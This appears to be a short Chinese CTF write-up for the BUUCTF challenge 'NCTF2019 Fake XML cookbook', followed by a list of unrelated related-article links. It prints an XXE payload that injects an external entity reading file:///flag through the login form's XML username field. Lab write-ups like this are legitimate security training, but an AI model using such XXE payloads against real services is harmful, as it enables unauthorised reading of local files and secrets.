BUUCTF[NCTF2019]Fake XML cookbook

热度：48 发布时间：2023-12-05 17:24:36.0

打开发现一个登录窗口，尝试常见的admin密码登录失败，直接BP抓包

发现username和password是xml格式

尝试XML外部实体注入

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///flag">]>
<user><username>&admin;</username><password>123456</password></user>

得到flag

XXE漏洞详情还可以看这篇文章

从XML相关一步一步到XXE漏洞

查看全文

相关解决方案

《AS 三 Cookbook 中文版》第二章. 自定义类 2.0. 简介
《AS 三 Cookbook 中文版》第三章. 运行时环境 3.0. 简介
JQuery CookBook 通译连载5（第1章发布）
JQuery CookBook 通译连载6（第2章发布）
ActionScript 三 Cookbook 简体中文学习手册
jSoup Cookbook-提取数据七使用选择器语法查找元素
读物：JavaScript Cookbook
一个送分题喔!今天再看《Apache Maven 3 Cookbook》，里面的SCM是指什么？解决方法
前不久在翻译国外一本新书 The Android Developer's Cookbook: Building Applications with the敬请关注
SQL COOKBOOK 练习3.9在SQL SERVER上的异常
SQL Cookbook（二零一零年11月04日）
读书笔记 SQL cookbook 一
读书笔记 SQL cookbook 二
Python Cookbook 2字符串和文本
Fake gps pro虚拟定位
【DP】【强联通分量】【组合数学】CodeForces804F Fake bullions
MySQL事务——《MySQL8 CookBook》笔记
[buuctf]reverse3 base64特征
【buuctf】xor
[buuctf][CISCN2019 华北赛区 Day2 Web1]Hack World
【buuctf】Online tool 命令执行RCEnmap
[buuctf][网鼎杯 2018]Fakebook 构造反序列化
python cookbook class
Python cookbook functions
Python cookbook read data
Python cookbook iterator and generator
Python cookbook time and data
Python cookbook string and text
Python cookbook container second
Python cookbook container first